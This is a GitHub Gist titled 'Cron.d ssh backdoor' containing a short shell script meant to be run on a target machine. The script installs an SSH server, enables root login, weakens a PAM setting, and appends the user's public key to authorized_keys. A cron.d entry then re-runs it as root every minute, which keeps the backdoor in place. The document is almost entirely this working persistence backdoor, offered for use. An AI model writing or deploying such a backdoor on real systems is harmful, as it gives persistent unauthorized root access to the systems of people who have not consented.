Last active
May 7, 2024 10:56
-
-
Save grahamhelton/b78f9238544e63c0046b4a20e3aed188 to your computer and use it in GitHub Desktop.
Cron.d ssh backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure that the target has cron running! | |
cat << EOF > /tmp/ssh.sh | |
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p ~/.ssh && touch authorized_keys ; echo "YOUR PUBLIC KEY HERE" >> ~/.ssh/authorized_keys ; /usr/sbin/service ssh restart | |
EOF | |
chmod +x /tmp/ssh.sh | |
# This will keep adding your SSH key, you could change `>>` to `>` but that will overwrite other keys in there. | |
echo "* * * * * root cd /tmp && sh ssh.sh" >> /etc/cron.d/ssh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment